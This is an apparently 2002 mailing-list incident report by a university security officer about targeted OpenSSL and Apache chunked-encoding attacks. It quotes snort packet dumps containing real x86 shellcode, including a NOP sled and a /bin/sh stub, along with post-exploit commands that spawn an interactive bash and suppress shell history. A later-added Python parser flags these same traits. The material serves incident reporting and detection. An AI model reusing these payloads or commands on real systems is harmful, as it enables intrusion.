non worm ssl attacks

Russell Fulton r.fulton at auckland.ac.nz
Tue Sep 17 09:53:38 GMT 2002


Hi, we have just had 3 servers attacked via OpenSSL using very similar
exploits to the slapper worm.  There are however differences:

1/ there was no port 80 scan or probes (targets had clearly been
selected beforehand)
2/ there were many more iterations of the basic attack (around 30)

None of the systems were compromised.

Here is the snortsnarf summary of the attack on one system:

Earliest: 17:37:20.489882 on 09/17/2002  (times are UTC +1200)
Latest: 17:39:13.367289 on 09/17/2002

3 different signatures are present for 211.224.129.96 as a source

    * 28 instances of OpenSSL worm attack
    * 28 instances of Apache chunked encoding exploit, uname -a
    * 31 instances of Apache chunked encoding exploit, AAAAA padding

snort packet dumps from one iteration:

[**] Apache chunked encoding exploit, AAAAA padding [**]
09/17-05:37:33.740719 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x21C
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12337
IpLen:20 DgmLen:526 DF
***AP*** Seq: 0xB9A41B14  Ack: 0xFC880B34  Win: 0x1DCE  TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261451 45779712 
81 D8 02 01 00 80 00 00 00 80 01 4E C4 44 22 F0  ...........N.D".
A2 3B 7B 70 A8 24 1D D2 62 DA 15 96 7A 16 55 33  .;{p.$..b...z.U3
D1 84 55 86 AA 1B 53 B0 E8 25 4B 4F 4A 01 D2 17  ..U...S..%KOJ...
E6 43 31 09 EC 04 74 80 04 14 22 D6 BD E9 BD 8D  .C1...t...".....
2D 91 AC 39 C6 15 32 38 25 BC 15 8A ED CE C1 A9  -..9..28%.......
D7 6B 92 02 E0 6A 28 69 E4 41 1F AB DD 46 46 CB  .k...j(i.A...FF.
A0 74 E8 5B C4 59 DC 9F B6 52 69 C6 A4 16 94 CC  .t.[.Y...Ri.....
13 FF C6 76 4F 3E A0 88 72 1A CE 11 AF 34 4D 45  ...vO>..r....4ME
8D 7E 2E F4 BC 00 EF C6 FB 63 44 5D 0E 0C 2F 34  .~.......cD]../4
2F 0B 48 2C 41 41 41 41 41 41 41 41 41 41 41 41  /.H,AAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 00 00 00 00 00 00 00 00 41 41 41 41  AAAA........AAAA
01 00 00 00 41 41 41 41 41 41 41 41 41 41 41 41  ....AAAAAAAAAAAA
8C D0 69 40 41 41 41 41 00 00 00 00 00 00 00 00  ..i@AAAA........
00 00 00 00 41 41 41 41 41 41 41 41 00 00 00 00  ....AAAAAAAA....
11 00 00 00 F0 37 3D 08 A0 11 1D 08 10 00 00 00  .....7=.........
10 00 00 00 EB 0A 90 90 90 90 90 90 90 90 90 90  ................
31 DB 89 E7 8D 77 10 89 77 04 8D 4F 20 89 4F 08  1....w..w..O .O.
B3 10 89 19 31 C9 B1 FF 89 0F 51 31 C0 B0 66 B3  ....1.....Q1..f.
07 89 F9 CD 80 59 31 DB 39 D8 75 0A 66 B8 CA A6  .....Y1.9.u.f...
66 39 46 02 74 02 E2 E0 89 CB 31 C9 B1 03 31 C0  f9F.t.....1...1.
B0 3F 49 CD 80 41 E2 F6 31 C9 F7 E1 51 5B B0 A4  .?I..A..1...Q[..
CD 80 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89  ..1.Ph//shh/bin.
E3 50 53 89 E1 99 B0 0B CD 80                    .PS.......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] OpenSSL worm attack [**]
09/17-05:37:35.403562 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x6F
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12340
IpLen:20 DgmLen:97 DF
***AP*** Seq: 0xB9A41D11  Ack: 0xFC880B6D  Win: 0x1DCE  TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261618 45779777 
54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F  TERM=xterm; expo
72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65  rt TERM=xterm; e
78 65 63 20 62 61 73 68 20 2D 69 0A 0A           xec bash -i..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] Apache chunked encoding exploit, uname -a [**]
09/17-05:37:35.403639 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x64
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12341
IpLen:20 DgmLen:86 DF
***AP**F Seq: 0xB9A41D3E  Ack: 0xFC880B6D  Win: 0x1DCE  TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261618 45779777 
75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 20  unset HISTFILE; 
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B  uname -a; id; w;
0A 0A                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Looks to me as if someone has repackaged the exploits to use in a more
directed fashion.

-- 
Russell Fulton, Computer and Network Security Officer
The University of Auckland,  New Zealand

"It ain't necessarily so"  - Gershwin
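Added example (not part of the original message, and not a snort or snortsnarf tool): a small parser that reads snort "-d" style dumps like the ones quoted above, rebuilds each alert's payload from the hex column, and tags the payload traits a defender would look for when triaging these alerts (long 0x41 padding, a NOP sled, an embedded shell path, int 0x80 syscall stubs, and the post-exploitation shell commands). The alert names, header lines and payload bytes in SAMPLE_DUMP are a constructed excerpt of the three dumps in the post, not a full capture; the thresholds are assumptions chosen for this data.

```python
"""Parse snort-style packet hex dumps and flag payload traits.

Added example for the mailing-list post above; it is not part of the
original message and not a snort/snortsnarf feature. Input format assumed:
an alert banner "[**] name [**]" followed by header lines and hex-dump lines
of the form "HH HH ... HH  ascii", as in the dumps quoted in the post.
"""
import re

ALERT_LINE = re.compile(r"^\[\*\*\] (.+?) \[\*\*\]$")
HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")

# Constructed excerpt modelled on the three alerts quoted in the post
# (bytes taken from those dumps; most of the padding and header lines are
# left out to keep the sample short).
SAMPLE_DUMP = """\
[**] Apache chunked encoding exploit, AAAAA padding [**]
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12337
IpLen:20 DgmLen:526 DF
2F 0B 48 2C 41 41 41 41 41 41 41 41 41 41 41 41  /.H,AAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
10 00 00 00 EB 0A 90 90 90 90 90 90 90 90 90 90  ................
CD 80 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89  ..1.Ph//shh/bin.
E3 50 53 89 E1 99 B0 0B CD 80                    .PS.......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] OpenSSL worm attack [**]
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12340
54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F  TERM=xterm; expo
72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65  rt TERM=xterm; e
78 65 63 20 62 61 73 68 20 2D 69 0A 0A           xec bash -i..

[**] Apache chunked encoding exploit, uname -a [**]
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12341
75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 20  unset HISTFILE; 
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B  uname -a; id; w;
0A 0A                                            ..
"""


def parse_snort_dump(text):
    """Return a list of (alert_name, payload_bytes) in the order seen.

    Only the hex column is decoded, so the ASCII column (which mail archives
    sometimes mangle) is never relied on. Header lines such as "IpLen:20
    DgmLen:526 DF" are skipped because not every token is a hex pair.
    """
    alerts = []
    name, buf = None, bytearray()
    for line in text.splitlines():
        m = ALERT_LINE.match(line)
        if m:
            if name is not None:
                alerts.append((name, bytes(buf)))
            name, buf = m.group(1), bytearray()
            continue
        hexpart = line.split("  ", 1)[0]       # hex column ends at 2 spaces
        tokens = hexpart.split()
        if name is not None and tokens and all(HEX_PAIR.fullmatch(t) for t in tokens):
            buf.extend(bytes.fromhex(hexpart))
    if name is not None:
        alerts.append((name, bytes(buf)))
    return alerts


def classify_payload(payload):
    """Tag payload traits; thresholds are assumptions tuned for this sample."""
    findings = []
    if re.search(rb"\x41{32,}", payload):          # 'A' * n filler
        findings.append("long_A_padding")
    if re.search(rb"\x90{8,}", payload):           # run of x86 NOPs
        findings.append("nop_sled")
    if b"//sh" in payload and b"/bin" in payload:  # pushed "/bin//sh" string
        findings.append("embedded_shell_path")
    if payload.count(b"\xcd\x80") >= 2:            # int 0x80: weak on its own
        findings.append("linux_syscalls")
    if re.search(rb"exec\s+bash\s+-i", payload):
        findings.append("interactive_shell_command")
    if re.search(rb"unset\s+HISTFILE", payload):
        findings.append("history_suppression")
    if re.search(rb"uname\s+-a", payload):
        findings.append("host_recon")
    return findings


def triage(text):
    """Return (alert_name, payload_length, findings) for every alert in text."""
    return [(name, len(p), classify_payload(p)) for name, p in parse_snort_dump(text)]


if __name__ == "__main__":
    for name, size, findings in triage(SAMPLE_DUMP):
        print(f"{name}: {size} bytes -> {', '.join(findings) or 'nothing flagged'}")
```

Run against the full dumps from the post, the three alerts come out as one binary payload with padding, a NOP sled and a shell-spawning stub, followed by two plain-text command strings; that pairing (exploit packet, then shell commands on the same TCP session) is what makes a hand-driven attack look like the worm to a signature engine, and it is also the pattern to alert on regardless of which signature name fires first. The two-occurrence int 0x80 check is deliberately loose and is only meaningful alongside the other tags.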